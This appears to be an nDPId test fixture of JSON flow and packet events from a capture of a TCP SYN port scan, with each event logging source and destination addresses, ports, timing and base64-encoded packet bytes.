+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/QMAADYGFW+sEAAIQA2GNIzSw1DdUoMYAAAAAGACDABpPgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1735,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsj3AAADkGgAKsEAAIQA2GNIzSF\/HdUoMYAAAAAGACCAAYngAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsPl0AADAG2hWsEAAIQA2GNIzSDRfdUoMYAAAAAGACBAAneAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1737,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAs24AAAC0GP\/KsEAAIQA2GNIzSzlbdUoMYAAAAAGACCABiOAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAs6Y8AACcGN+OsEAAIQA2GNIzSPpLdUoMYAAAAAGACEADp\/AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsLOEAACsG8JGsEAAIQA2GNIzSwA\/dUoMYAAAAAGACEABofwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsboUAADIGp+2sEAAIQA2GNIzSGoXdUoMYAAAAAGACDAASCgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsVxkAACcGylmsEAAIQA2GNIzSF3TdUoMYAAAAAGACEAARGwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsbJ8AADoGodOsEAAIQA2GNIzSBCHdUoMYAAAAAGACDAAobgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsE7MAACUGD8CsEAAIQA2GNIzSD0rdUoMYAAAAAGACCAAhRQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAszqgAACUGVMqsEAAIQA2GNIzS\/23dUoMYAAAAAGACCAAxIQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsjYwAACsGj+asEAAIQA2GNIzSGWbdUoMYAAAAAGACEAAPKQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAse1IAADMGmiCsEAAIQA2GNIzSQmHdUoMYAAAAAGACEADmLQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAscwEAAC4Gp3GsEAAIQA2GNIzSBH3dUoMYAAAAAGACDAAoEgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs3eAAACwGPpKsEAAIQA2GNIzTBEHdU4MZAAAAAGACBAAwSwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs+toAACwGIZisEAAIQA2GNIzTeOfdU4MZAAAAAGACBAC7pAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAscqoAADUGoMisEAAIQA2GNIzTB9rdU4MZAAAAAGACCAAosgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsQX4AAC0G2fSsEAAIQA2GNIzTG7\/dU4MZAAAAAGACCAAUzQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsVJYAADcGvNysEAAIQA2GNIzTGgvdU4MZAAAAAGACEAAOgQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs+30AADAGHPWsEAAIQA2GNIzTTv3dU4MZAAAAAGACBADljgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRoAAC4GpVisEAAIQA2GNIzTDIvdU4MZAAAAAGACDAAgAQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsb7MAAC0Gq7+sEAAIQA2GNIzTAbzdU4MZAAAAAGACCAAu0AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_packet_id":1,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061071,"pkt":"ACYLMQczACWzv5HuCABFAAAs3jwAADYGNDasEAAIQA2GNIzTFO3dU4MZAAAAAGACDAAXnwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_packet_id":1,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061071,"pkt":"ACYLMQczACWzv5HuCABFAAAsrI8AADoGYeOsEAAIQA2GNIzTC17dU4MZAAAAAGACDAAhLgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 